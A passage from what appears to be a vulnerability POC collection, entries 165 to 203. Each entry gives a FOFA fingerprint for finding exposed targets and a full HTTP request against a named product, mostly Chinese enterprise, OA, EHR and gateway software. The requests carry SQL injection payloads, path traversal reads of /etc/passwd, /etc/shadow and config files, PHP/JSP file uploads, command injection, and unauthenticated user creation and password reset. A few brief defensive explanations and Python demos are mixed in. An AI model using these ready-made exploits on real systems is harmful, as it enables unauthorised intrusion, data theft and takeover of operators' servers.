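        print(f"{p.filename:30} unsafe -> {save_upload_unsafe(p):40} safe -> {classify(p)}")
```

The unsafe function accepts test.php because the POC declares image/png, and resolves ../../../../dizxdell.aspx to a path outside the upload root; the safe one rejects both before anything is written, and the double-extension shell.php.png is stored only under a random name ending in .png, so no server-side interpreter ever sees it.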
165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL (path elided in the source): https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信票务管理平台 SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

(solutionNo decodes to ' AND 4172 IN (SELECT (CHAR(104)+CHAR(101)+CHAR(108)+CHAR(108)+CHAR(111)))-- bErE, an SQL Server error-based probe whose CHAR() chain spells "hello".)

167. 精益价值管理系统 DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Note the /templates/attestation/../../ prefix on the request path (entry 170 uses the same one); detection rules that match only the normalized servlet path will miss these requests.

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星CMSV6车载定位监控平台 SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT-高清车牌识别摄像机 arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

Note: HTTP clients normally collapse the leading ../ segments before sending; the request line has to go out verbatim (for example with curl --path-as-is or a raw socket).

173. Check Point Security Gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. 电信网关配置管理系统 rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure (configuration file download)
The configuration file is requested by model name; one path per model:
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C校园网自助服务系统 flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

The stored file takes its name from the form-field name (12234.txt), not from filename. Verify with:
GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文工程管理系统 DownLoad2.aspx arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技企业标准化管理系统 AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创图书馆集群管理系统 updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

(The request body is a raw SQL INSERT that the endpoint executes as-is.)

185. 瑞友天翼应用虚拟化系统 SQL injection (stacked query writing a file with INTO OUTFILE)
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

The appid value decodes to 3');select unhex('...') into outfile '.\\..\\..\\WebRoot\\plom.xgi'#, and the hex literal decodes to <?php echo md5("1"); $file = __FILE__; unlink($file); so a successful run drops a self-deleting PHP probe at WebRoot\plom.xgi.

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power plants.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

(SQLite heavy-query time-based payload built on RANDOMBLOB: a true condition makes the response noticeably slower.)

187. Mura CMS processAsyncObject SQL injection (time-based variant of entry 158, same CVE)
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

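Both POCs for CVE-2024-32640 (entries 158 and 187) break out of the string with x\' rather than a bare quote (%5c is the backslash). That is the signature of a filter that neutralizes single quotes by doubling them while leaving the backslash untouched, against a MySQL backend where a backslash escapes the next character: after doubling, x\'' is the literal x' followed by a quote that closes the string. The Python below is an added example for this page, not Mura or Masa CMS code; escape_by_doubling() and the query shape in build_query() are assumptions standing in for whatever the product did, and literal_end() is a small scanner implementing MySQL's string-literal rules (with a switch for the NO_BACKSLASH_ESCAPES sql_mode) so the effect can be checked offline without a database.

```python
def escape_by_doubling(value: str) -> str:
    """Assumed vulnerable filter: doubles single quotes, ignores backslashes."""
    return value.replace("'", "''")


def build_query(contenthistid: str) -> str:
    """Assumed query shape (illustrative; not the product's SQL)."""
    return ("SELECT * FROM tcontent WHERE contenthistid = '"
            + escape_by_doubling(contenthistid) + "'")


def literal_end(sql: str, start: int, backslash_escapes: bool = True) -> int:
    """Index of the quote that closes the single-quoted literal opening at
    sql[start], scanning with MySQL rules: '' is an escaped quote, and unless
    sql_mode contains NO_BACKSLASH_ESCAPES a backslash escapes the next char.
    Raises ValueError when the literal never closes (a syntax error in MySQL)."""
    assert sql[start] == "'"
    i = start + 1
    while i < len(sql):
        c = sql[i]
        if backslash_escapes and c == "\\":
            i += 2                      # backslash + the character it escapes
            continue
        if c == "'":
            if i + 1 < len(sql) and sql[i + 1] == "'":
                i += 2                  # doubled quote: still inside the literal
                continue
            return i                    # closing quote
        i += 1
    raise ValueError("unterminated string literal")


def tail_after_literal(sql: str, backslash_escapes: bool = True) -> str:
    """Everything the parser sees as SQL after the first string literal closes."""
    start = sql.index("'")
    end = literal_end(sql, start, backslash_escapes)
    return sql[end + 1:]


def injected_sql(contenthistid: str, backslash_escapes: bool = True) -> str:
    """'' if the doubling filter held, the injected SQL tail if it did not, or
    'SYNTAX ERROR' if the literal never closes (entry 158's bare x\\' probe)."""
    try:
        return tail_after_literal(build_query(contenthistid), backslash_escapes)
    except ValueError:
        return "SYNTAX ERROR"


if __name__ == "__main__":
    for value in ["x' AND 1=1-- a",                       # plain quote: filter holds
                  "x\\'",                                 # entry 158 probe
                  "x\\' AND (SELECT SLEEP(5))-- Arrv"]:   # entry 187 shape
        print(f"{value!r:40} -> {injected_sql(value)!r}")
    print("with NO_BACKSLASH_ESCAPES:",
          repr(injected_sql("x\\' AND (SELECT SLEEP(5))-- Arrv", backslash_escapes=False)))
```

The bare x\' probe from entry 158 leaves the literal unterminated, which is why it produces a database error and serves as a fingerprint; the entry 187 payload closes the literal and appends the SLEEP(5) subquery, with the original closing quote swallowed by the -- comment. The fix is not a better escaper but bound parameters (cfqueryparam in ColdFusion/Lucee), which never let the value reach the SQL parser as text.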
188. 叁体-佳会视频会议 attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技临床浏览系统 deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

(poi is fetched as a URL; the file:// scheme turns the fetch into a local file read.)

191. ESAFENET (亿赛通) Electronic Document Security Management System NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=0

192. Futong Tianxia (富通天下) Foreign Trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. Hillstone (山石网科) Yunjian Security Management System setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. FE (飞企互联) Enterprise Operations Management Platform uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. Volans (飞鱼星) Internet Behavior Management System send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. Henan Fengsu Technology (河南省风速科技) Unified Authentication Platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. Zheda Ente (浙大恩特) Customer Resource Management System Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. Aliyun Drive (阿里云盘) WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. Cockpit system assetsmanager_upload endpoint file upload

1. Run the POC to obtain the CSRF token, then obtain the cookie, then upload and access the result:

GET /auth/login?to=/ HTTP/1.1

Response: 200, returned value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get a cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returned value:
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/;

Fofa:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. Founder (方正) All-Media News Editing System binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. WeEngine (微擎) system AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Replace the __VIEWSTATE and __EVENTVALIDATION values:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"

-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. Redsea Cloud (红海云) EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--